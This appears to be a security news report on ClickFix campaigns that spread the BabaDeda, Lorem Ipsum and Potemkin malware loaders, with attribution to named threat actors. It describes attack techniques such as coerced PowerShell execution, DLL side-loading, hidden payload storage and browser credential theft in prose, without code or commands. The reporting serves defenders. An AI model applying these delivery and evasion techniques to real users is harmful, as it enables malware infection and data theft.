Cybersecurity researchers are sounding the alarm over multiple **ClickFix** campaigns, which are actively distributing three distinct malware loaders: **BabaDeda Loader**, **Lorem Ipsum Loader**, and **Potemkin**. Independent analyses from **Morphisec**, **BlueVoyant**, and **Huntress** detail the evolving tactics and advanced capabilities of these threats.  ### BabaDeda Loader Targets Education and Finance **BabaDeda Loader** campaigns, observed in April 2026, have specifically targeted organizations in the education and financial sectors. **Morphisec** researcher Shmuel Uzan noted, "Earlier BabaDeda activity was known for concealing malicious payloads inside legitimate looking installer packages. This new framework keeps that same code genome but expands it into a far more capable loader built for stealth, evasion, and payload flexibility." These attacks initiate with a **ClickFix** social engineering ploy, coercing users into running attacker-supplied PowerShell commands. The loader then deploys information stealers and RATs by combining techniques such as hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage. The activity is linked to **BabaDeda**, a crypter service first documented by **Morphisec** in November 2021 for its role in targeting cryptocurrency and Web3 sectors with information stealers, RATs, and **LockBit** ransomware. The loader is designed to profile the host, avoid Russian or Belarusian systems, and perform security product checks before retrieving and injecting its main payload into trusted Windows processes like `svchost.exe`. One of the malware families delivered by **BabaDeda Loader** is a .NET backdoor and information stealer with extensive capabilities, including: * Collecting detailed system information * Discovering installed browser profiles and extracting artifacts (cookies, history, credentials) * Traversing directories and exfiltrating file contents * Capturing screenshots and displaying information * Executing shell commands or external processes * Transferring data to a command-and-control (C2) server * Utilizing native Windows APIs for process interaction, memory operations, and DPAPI access Another attack chain involves a ZIP archive that uses DLL side-loading to launch **DanaBot** and **SectopRAT** (also known as **ArechClient**). These attacks are characterized by a staged loader component called **Storage Crypter**, which reads payload material from external storage files such as `List.Control.dat`.  **Morphisec** highlights the stealth of this approach: "The visible application package appears legitimate, while malicious payloads remain hidden inside externally stored containers and are decoded only moments before execution. This design minimizes forensic visibility, complicates automated analysis, and reduces opportunities for traditional security tools to identify malicious activity before execution occurs." These findings underscore the evolution of modern loader frameworks, which are becoming increasingly modular, separating delivery, storage, execution, and payload deployment into distinct components. ### ClickFix Chain Drops Lorem Ipsum Loader The **ClickFix** technique is also being exploited in a campaign that leverages at least five compromised **WordPress** sites as initial access points to deliver the nascent **Lorem Ipsum Loader** and backdoor. These hacked websites span architecture, legal services, and construction technology sectors. This marks a shift from previous opportunistic campaigns that used trojanized **Microsoft Teams** installers via fake download portals. The loader is believed to have been active since February 2026. **BlueVoyant** researchers Thomas Elkins and Joshua Green stated, "The pivot to ClickFix lures hosted on compromised WordPress (WP) sites significantly broadens the potential victim pool and demonstrates the operators' willingness to rapidly adapt their initial access techniques." This change in delivery mechanism is attributed to **Microsoft's** recent disruption of **Fox Tempest** (also known as **Forging Marauder**), a threat actor that offered a malware-signing-as-a-service (MSaaS) operation. The loss of fraudulently signed **Microsoft Trusted Signing** certificates forced operators to adopt a delivery model that bypasses code signing entirely.  The threat activity cluster is confidently attributed to **Vanilla Tempest** (also known as **Rapid Brigantine**, **Vice Society**, and **Vice Spider**), a financially motivated threat actor known for deploying ransomware families such as **Rhysida**, **BlackCat**, **Zeppelin**, and **Quantum Locker**. Attack sequences distributing **Lorem Ipsum Loader** utilize **ClickFix**-style **Edge** web browser security update lures. These lures prompt users to run a malicious command that downloads a ZIP file and an outdated version of **Node.js** (version 7.10.1 from 2017) to execute JavaScript-based payloads, minimizing detection risks. The JavaScript payload acts as a dropper, deploying and executing additional malware components, including a batch script that establishes persistence by initiating a DLL side-loading chain. This chain executes a malicious DLL (`mscoree.dll` or `msvcp140.dll`), which then decodes the embedded **Lorem Ipsum Loader** payload. **BlueVoyant** explained, "The Lorem Ipsum Loader is designed to retrieve the next-stage Lorem Ipsum Backdoor from C2 infrastructure obtained from attacker-controlled profiles hosted on social networking platforms." This backdoor then executes further payloads from the C2 server, ultimately leading to **Rapid Brigantine's** established post-exploitation tooling and ransomware deployments, primarily **Rhysida**. ### Potemkin, RMMProject, and EtherRAT Delivered via ClickFix The third significant campaign relying on **ClickFix** is a sophisticated attack chain that installs an MSI package. This package then drops a previously undocumented loader, codenamed **Potemkin**, via an HTML Application (HTA) payload. **Potemkin** serves as a conduit for **EtherRAT** and **RMMProject**, a Lua-scriptable DLL with modules for remote screen control and browser credential theft.